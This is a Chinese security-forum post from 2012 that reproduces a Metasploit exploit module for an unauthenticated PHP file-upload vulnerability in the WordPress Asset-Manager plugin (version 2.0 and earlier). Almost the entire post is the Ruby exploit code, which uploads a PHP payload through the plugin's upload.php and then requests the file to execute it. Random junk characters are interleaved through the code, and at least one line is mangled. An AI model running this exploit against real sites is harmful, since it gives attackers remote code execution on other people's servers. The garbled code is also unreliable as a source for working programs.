找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2209|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。6 W! _5 d) G4 F# q9 I

+ n" W  L% @+ R0 h3 ^: f##
7 d5 [9 D( @6 A3 Y( [: `# This file is part of the Metasploit Framework and may be subject to
9 p# D' U" g2 F- d# redistribution and commercial restrictions. Please see the Metasploit
2 _8 ~( p' ~* ^# Framework web site for more information on licensing and terms of use.
/ w- J8 t! [$ l# x/ Q8 x0 |5 m, p#   http://metasploit.com/framework/: @" ]2 q% n0 p- Z
##
  N2 B" a0 I( }1 D: k1 E 8 Z5 e: R! X* l. s; u. [
require 'msf/core'
9 B/ s. D0 J/ i% \& `  O- mrequire 'msf/core/exploit/php_exe'
6 f' U' j1 W! l* q8 D% B; Q ' f  a4 t7 M; q6 p
class Metasploit3 < Msf::Exploit::Remote
  B5 m7 C* X! v  Rank = ExcellentRanking
! {+ e( ]& P' U; L/ n0 z * f$ h( r8 i9 e- t/ C# I  p) W
  include Msf::Exploit::Remote::HttpClient
  G; y- l4 r/ t$ H) p6 c. `6 B  include Msf::Exploit:hpEXE) u' O+ W( @3 c' V$ m% N+ z
0 j4 I# L1 M# q" d- S
  def initialize(info = {})" K- c; @! b4 M
    super(update_info(info,) n; i. t' p* Q/ V
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability'," A" f/ h  |) H" s9 y( B5 w; d3 `
      'Description'    => %q{$ I; K6 ~0 `# V4 E+ `1 ^9 h0 g
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress" I* z9 q% j/ T4 ^, V) t
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a: p1 }' ~* V; W( ]# P4 \0 y
        temp directory without authentication, which results in arbitrary code execution.. Q. a, \3 |# l5 N4 P' ^# H
      },
+ K' A* J+ f5 p5 ]      'Author'         =>5 c0 d9 z; V- y, z9 }
        [
7 y, ]) P' m; ~2 E          'Sammy FORGIT', # initial discovery" [( W# U! d2 x# U  i; W$ M
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ N) t* p- a+ M- R. A        ],
. m/ Y( ^; h, m! S9 Q) ?9 X( A2 S2 A      'License'        => MSF_LICENSE,
5 j* P! z4 G7 S. n) B$ Z  H4 m7 h      'References'     =>2 @& s, [2 d& c$ ]* F
        [7 _5 V! Z7 Q% r' C/ Z+ o5 `) r, g
          [ 'OSVDB', '82653' ],
. O8 ^! G+ k3 }0 Y# N$ g; d8 h          [ 'BID', '53809' ],/ ?3 |: P7 ]5 r( C9 i
          [ 'EDB', '18993' ],
  p6 ^/ H, F0 `  B4 g* u" k          [ 'URL', 'http:// www.myhack58.com /' ]
+ P0 b( J+ m, H0 w% d$ H8 j* ^        ],
9 w) L, f5 Z, w* F      'Payload'       =>8 c) Y' W& s  o- G  t* j% V/ S
        {
8 B' c. _" T* L. V3 T          'BadChars' => "\x00",. g! a7 c: [9 D! m# d
        },
, s, ^2 t5 _# \# c  y      'Platform'       => 'php',' o+ }; V9 I) a. Q" j2 G
      'Arch'           => ARCH_PHP,' P7 _! O/ l$ m4 K
      'Targets'        =>
3 @7 M; c* n$ h& Z8 B5 W8 |& r) [, q, n        [
. Q6 L9 I2 t. m; t( Y) _8 H          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
# w0 }  L+ h/ R4 \: f* H: n          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
6 x8 V9 x. g; g7 L/ I        ],
- \. k& C" R6 v7 u1 c      'DefaultTarget' => 0,
/ x4 w0 a8 a' x" r0 q      'DisclosureDate' => 'May 26 2012')), y* |- f# e) M: t0 U. S

/ b1 D, x7 I  U+ z7 o; }    register_options(5 ?; L3 a8 P3 ]5 z
      [
' ]- L0 I  M0 ~; t        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])7 @5 a: {  P8 }) n4 h" Q6 v8 @
      ], self.class)1 ]5 c, |8 W/ D& `) c
  end4 D6 \% j. P  _, c' W; K

; i0 M% i! T5 n2 o) e: r  def exploit$ E1 b/ y- x9 B4 D! q. w
    uri =  target_uri.path
  y+ ?* E. Z$ \# L  r    uri << '/' if uri[-1,1] != '/'5 h$ W' b% b7 f+ x
    peer = "#{rhost}:#{rport}"4 {$ t3 H% p0 ~) |- i, G/ {9 O9 ?
    payload_name = "#{rand_text_alpha(5)}.php"7 C+ h. e. {) O/ w
    php_payload = get_write_exec_payload(:unlink_self=>true)  |$ I4 w& M2 _1 |% Z

# r7 Z) `* G$ N8 ]    data = Rex::MIME::Message.new5 l+ Y: Q. _) O  s4 [' o, E
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
- @7 F) q& d# v: i1 |1 `& C    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 s* ~5 R3 E6 {9 T& Z

* ?3 y. O: O/ Q6 [+ I    print_status("#{peer} - Uploading payload #{payload_name}")
# S! v1 ]8 h. e3 E    res = send_request_cgi({* R/ T1 i+ j: ?8 B7 y, `- p' K- v
      'method'  => 'POST',4 [0 J! N/ S/ @9 T0 x: f
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",9 L& R; ^/ G$ f* k+ ?# G
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
1 @- d8 v9 t: F      'data'    => post_data
6 U5 t( b+ b! r. a    })
) f3 O: g& Q0 k' b4 z; |
4 x. P- ^& t, L. I6 s" i    if not res or res.code != 200 or res.body !~ /#{payload_name}/
" X% z5 Z$ S$ ^, y4 N      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")! Y; R2 H" ?/ _: x+ w
end8 u# I2 f2 h0 I; v9 O

! S( [0 \" z# ^1 O    print_status("#{peer} - Executing payload #{payload_name}")3 G3 f4 }3 C+ V
    res = send_request_raw({
1 f# {1 b& [5 g( C      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
# D  l8 u, a2 Y, X  j) c  C0 q+ l" k      'method'  => 'GET'8 D) w1 O5 Y5 m
    })' X9 e/ }1 [6 P. Q4 M& y

8 b- T+ x; i2 A. I    if res and res.code != 200- t5 ?/ H! M. [3 [+ Y  i
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")9 ^8 H: i6 v) e  Z2 T$ o
    end' [! u9 P) @; q: U. m3 {6 m
  end& f" x: l0 t! q7 F3 L, e- `" M
end+ c9 Y) L0 H; @+ e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表